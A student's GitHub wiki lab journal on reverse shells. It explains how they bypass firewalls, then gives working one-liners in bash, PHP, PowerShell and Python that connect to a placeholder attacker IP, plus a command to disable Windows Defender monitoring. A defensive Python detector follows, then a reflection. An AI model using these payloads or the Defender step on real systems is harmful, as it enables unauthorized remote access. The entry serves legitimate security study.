Class Activity 8.2 Reverse Shells - Foren-Ken/tech-journal GitHub Wiki
What is a reverse shell?
Reverse shells work in the opposite direction to a normal remote shell: instead of the attacker connecting in to the target, the target connects out to the attacker's listener, receives commands over that connection and runs them locally. After a little research, this method seems to be used to bypass safeguards like firewalls, which are usually configured to filter inbound connections and do not expect the machine initiating an outbound connection to also be the victim.
Techniques:
Linux: Reverse shells on this platform are very simple, because bash has the /dev/tcp pseudo-device built in. The command is as follows:
bash -i >& /dev/tcp/[Attacker IP]/[Attacker Port] 0>&1
Credit: swisskyrepo.github.io
This method can be extended to web servers: a PHP page can run the same command, so that simply visiting the page triggers the reverse shell.
<?php $ip = '[Attacker IP]'; $port = [Attacker Port]; $cmd = '/bin/bash -i >& /dev/tcp/' . $ip . '/' . $port . ' 0>&1'; exec($cmd); ?>
Windows: Windows Defender will prevent this from working. The following command turns off Defender's real-time monitoring, assuming tamper protection is off:
Set-MpPreference -DisableRealtimeMonitoring $true
To then run a reverse shell, the following PowerShell one-liner can be used:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKERIP',ATTACKERPORT); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Python: Reverse shells in Python, or in other scripting languages, can easily be found with a simple web search. swisskyrepo.github.io is a great catalog of reverse shells in different languages. For Python, I tested and verified the following reverse shell (on Python 2.7.5):
python -c 'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("Attacker_IP",Attacker_Port));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
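As an added example (my own code, not from the journal or from swisskyrepo), here is the defender-side view of what every one-liner above has in common: the shell's standard file descriptors end up on a TCP socket instead of a terminal, which on Linux is visible in /proc/<pid>/fd. The function names are hypothetical and the sample fd maps are constructed.

```python
"""Added example (not from the journal): flag shells whose stdio is a network socket.
bash's '>& /dev/tcp/...' redirection and Python's dup2() one-liner both leave a shell
with fds 0, 1, 2 on a TCP socket; on Linux, /proc/<pid>/fd/N then links to 'socket:[inode]'.
"""
import os

# Shells and interpreters that are normally attached to a tty, not a socket.
SHELL_LIKE = {"sh", "bash", "dash", "zsh", "python", "python2", "python3", "perl", "php"}
STDIO = (0, 1, 2)

def socket_stdio_fds(fd_targets):
    """Return the standard fds (0-2) whose symlink target is a socket."""
    return [fd for fd in STDIO if fd_targets.get(fd, "").startswith("socket:")]

def classify(comm, fd_targets):
    """Verdict for one process from its short name (comm) and its {fd: target} map.
    'reverse-shell-like': shell/interpreter with all three stdio fds on sockets;
    'socket-stdio': some stdio fd on a socket (socket-activated daemons look like
    this, so treat it as a lead to triage, not proof); 'clean': tty, pipe or file.
    """
    hits = socket_stdio_fds(fd_targets)
    if not hits:
        return "clean"
    if len(hits) == 3 and comm in SHELL_LIKE:
        return "reverse-shell-like"
    return "socket-stdio"

def scan_proc(proc_root="/proc"):
    """Walk a live /proc tree; return {pid: verdict} for every non-clean process."""
    findings = {}
    if not os.path.isdir(proc_root):
        return findings
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "comm")) as fh:
                comm = fh.read().strip()
            fd_dir = os.path.join(proc_root, entry, "fd")
            targets = {int(fd): os.readlink(os.path.join(fd_dir, fd)) for fd in os.listdir(fd_dir)}
        except (OSError, ValueError):
            continue  # process exited, or we lack permission to read its fds
        verdict = classify(comm, targets)
        if verdict != "clean":
            findings[int(entry)] = verdict
    return findings

# Constructed samples of /proc/<pid>/fd link targets: bash on a tty vs. stdio on one TCP socket.
SAMPLE_TTY_SHELL = {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0", 255: "/dev/pts/0"}
SAMPLE_REVERSE_SHELL = {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}
```

Run scan_proc() as root on a Linux host to list every process whose stdio sits on a socket; a sshd or tmux session shows up as clean because its shell is attached to a pty.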
Reflection
The major reflection I have for this lab is how little I understand sockets and processes over networks. This is a major item I want to learn and develop skills in, because this skill can be applied in many different situations. If I plan to pursue pen-testing, this skill would make private scripts more cohesive, as I will understand how what I'm doing works. Other professions I'm interested in, like DFIR, could use knowledge of sockets and reverse shells to understand how an incident happened and investigate who did it.